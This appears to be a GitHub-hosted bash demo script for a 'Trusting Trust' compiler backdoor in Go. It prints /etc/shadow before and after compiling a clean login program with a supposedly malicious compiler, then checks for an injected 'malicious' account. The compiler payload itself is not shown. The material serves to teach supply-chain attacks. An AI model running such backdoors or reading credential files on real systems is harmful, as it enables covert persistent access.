-
Notifications
You must be signed in to change notification settings - Fork 0
/
demo_exploit.sh
78 lines (61 loc) · 4.15 KB
/
demo_exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/bin/bash
echo -e "\n\n*******************************************************************************"
echo -e "_____________ __ __________________ ________ __________ __ _____________\n /_ __/ __ \/ / / / ___/_ __/ _/ | / / ____/ /_ __/ __ \/ / / / ___/_ __/\n / / / /_/ / / / /\__ \ / / / // |/ / / __ / / / /_/ / / / /\__ \ / / \n / / / _, _/ /_/ /___/ // / _/ // /| / /_/ / / / / _, _/ /_/ /___/ // / \n/_/ /_/ |_|\____//____//_/ /___/_/ |_/\____/ /_/ /_/ |_|\____//____//_/ \n \n"
echo -e "*******************************************************************************\n\n"
echo -e "The 'Trusting Trust' attack is a type of compiler exploit where a malicious compiler is used to inject malicious code into a program, even if the program's source code is clean, leveraging the trust developers put in their code.\nThis is done by modifying the compiler to recognize specific patterns in the source code and replacing them with malicious code.\nThe attack is self-replicating, a quine, meaning that even if the malicious compiler is upgraded, the new compiler will also be malicious. This allows for attacker persistence and assumes we build our compilers from source."
sleep 2
sleep 1
echo -e "\nThe exploit example shows a scenario where a malicious compiler targets a login program, creating a backdoor to login to the target system."
echo -e "\nIn this example, the initial access to plant the malicious compiler sources is unspecified, but many attack vectors apply (ref XCodeGhost etc).\nThe malicious compiler should already be installed on the system, to redo this process, you can run '/exploit/install_malicious_go_compiler.sh', eg by specfing it as entrypoint to the container."
sleep 2
echo -e "\n\n****************************************************"
echo -e "* EXPLOIT SCRIPT STARTING *"
echo -e "****************************************************\n\n"
# show initial state so we can grasp the exploit effects
echo -e "\n[PRE-EXPLOIT STATE]"
if ! command -v go &> /dev/null
then
echo ">> Go is not installed. Aborting."
exit 1
else
go_version=$(go version | grep -oP 'go1\.\d+\.\d+')
if [[ $go_version == "go1.11.1" || $go_version == "go1.11.2" ]]; then
echo ">> Malicious Go compiler version $go_version installed."
else
echo ">> Go compiler version $go_version may be benign."
fi
fi
sleep 1
echo -e "\n>> State of shadow file '/etc/shadow' before the exploit..."
echo -e "\n---------------------------------------------------------------"
cat /etc/shadow || { echo "Failed to read /etc/shadow"; exit 1; }
echo -e "--------------------------------------------------------------"
sleep 2
echo -e "\n>> Showing benign 'login.go' program..."
echo -e "\n---------------------------------------------------------------"
cat /exploit/login.go || { echo "Failed to read /exploit/login.go"; exit 1; }
echo -e "---------------------------------------------------------------"
sleep 1
echo -e "\n>> Compiling login.go 'go build /exploit/login.go'...\n"
sleep 1
go build /exploit/login.go || { echo "Compilation failed"; exit 1; }
echo -e "\n>> Compilation successful. Executing login program...\n"
sleep 1
echo -e "\n---------------------------------------------------------------"
/exploit/login || { echo "Failed to run the login program"; exit 1; }
echo -e "\n---------------------------------------------------------------"
echo -e "\n>> Execution of 'login.go' completed.\n"
sleep 2
# show state after supposed successful exploit
echo -e "\n[POST EXPLOIT STATE]\n"
echo -e ">> State of shadow file '/etc/shadow' **after** the exploit..."
echo -e "\n---------------------------------------------------------------"
cat /etc/shadow || { echo "Failed to read /etc/shadow"; exit 1; }
echo -e "---------------------------------------------------------------"
# check if successful
sleep 1
if grep -q "^malicious:.*:::::::" /etc/shadow; then
echo -e "\n>> Shadow file has been modified from benign source code.\n>> [EXPLOIT SUCCESSFUL]"
else
echo -e "\n>> No malicious change to shadow file was detected.\n>> [EXPLOIT FAILED]"
fi